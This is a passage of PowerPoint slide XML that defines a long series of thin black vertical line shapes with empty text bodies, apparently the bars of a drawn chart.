            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="235585">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="235426"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="438" name="object 438"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6667705" y="5226109"/>
            <a:ext cx="1258" cy="464331"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="635" h="234314">
                <a:moveTo>
                  <a:pt x="273" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="273" y="234203"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="439" name="object 439"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6696964" y="5236544"/>
            <a:ext cx="0" cy="454264"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="229235">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="228937"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="440" name="object 440"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6696692" y="5237885"/>
            <a:ext cx="1258" cy="453006"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="635" h="228600">
                <a:moveTo>
                  <a:pt x="273" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="273" y="228260"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="441" name="object 441"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6724817" y="5166287"/>
            <a:ext cx="0" cy="524731"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="264794">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="264392"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="442" name="object 442"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6722367" y="5165190"/>
            <a:ext cx="2517" cy="525990"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="1270" h="265430">
                <a:moveTo>
                  <a:pt x="549" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="549" y="264944"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="443" name="object 443"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6752724" y="5176506"/>
            <a:ext cx="0" cy="514665"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="259714">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="259229"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="444" name="object 444"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6752451" y="5175626"/>
            <a:ext cx="0" cy="514665"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="259714">
                <a:moveTo>
                  <a:pt x="0" y="259402"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="259678"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="5412">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="445" name="object 445"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6780630" y="5118571"/>
            <a:ext cx="0" cy="572549"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="288925">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="288470"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="446" name="object 446"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6780356" y="5119910"/>
            <a:ext cx="2517" cy="571290"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="1270" h="288289">
                <a:moveTo>
                  <a:pt x="549" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="549" y="287794"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="447" name="object 447"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6808482" y="5128749"/>
            <a:ext cx="0" cy="562482"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="283844">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="283334"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="448" name="object 448"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6807128" y="5130380"/>
            <a:ext cx="1258" cy="559965"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="635" h="282575">
                <a:moveTo>
                  <a:pt x="273" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="273" y="282511"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="449" name="object 449"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6836389" y="5075672"/>
            <a:ext cx="0" cy="615332"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="310514">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="310119"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="450" name="object 450"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6836117" y="5077011"/>
            <a:ext cx="1258" cy="614074"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="635" h="309880">
                <a:moveTo>
                  <a:pt x="273" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="273" y="309442"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="451" name="object 451"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6864242" y="5061213"/>
            <a:ext cx="0" cy="629174"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="317500">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="317409"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="452" name="object 452"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6861790" y="5058993"/>
            <a:ext cx="2517" cy="631691"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="1270" h="318769">
                <a:moveTo>
                  <a:pt x="549" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="549" y="318534"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="453" name="object 453"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6892147" y="5009187"/>
            <a:ext cx="0" cy="682025"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="344169">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="343668"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="454" name="object 454"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6891874" y="5011610"/>
            <a:ext cx="0" cy="679508"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="342900">
                <a:moveTo>
                  <a:pt x="0" y="342169"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="342445"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="5412">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="455" name="object 455"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6920053" y="4997916"/>
            <a:ext cx="0" cy="693350"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="349885">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="349356"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="456" name="object 456"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6919779" y="5000638"/>
            <a:ext cx="2517" cy="689575"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="1270" h="347980">
                <a:moveTo>
                  <a:pt x="549" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="549" y="347982"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="457" name="object 457"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6947360" y="4940558"/>
            <a:ext cx="0" cy="749976"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="378460">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="378295"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="458" name="object 458"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6946293" y="4939679"/>
            <a:ext cx="1258" cy="751234"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="635" h="379094">
                <a:moveTo>
                  <a:pt x="200" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="200" y="378744"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="459" name="object 459"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6975266" y="4944837"/>
            <a:ext cx="0" cy="746201"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="376555">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="376141"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="460" name="object 460"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6974992" y="4947263"/>
            <a:ext cx="2517" cy="743684"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="1270" h="375285">
                <a:moveTo>
                  <a:pt x="349" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="349" y="374918"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="461" name="object 461"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7003171" y="4876714"/>
            <a:ext cx="0" cy="814152"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="410844">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="410518"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="462" name="object 462"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7000967" y="4875619"/>
            <a:ext cx="2517" cy="815410"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="1270" h="411480">
                <a:moveTo>
                  <a:pt x="487" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="487" y="411071"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="463" name="object 463"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7031025" y="4878890"/>
            <a:ext cx="0" cy="811635"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="409575">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="409414"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="464" name="object 464"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7030753" y="4882118"/>
            <a:ext cx="1258" cy="809118"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="635" h="408305">
                <a:moveTo>
                  <a:pt x="75" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="75" y="407791"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
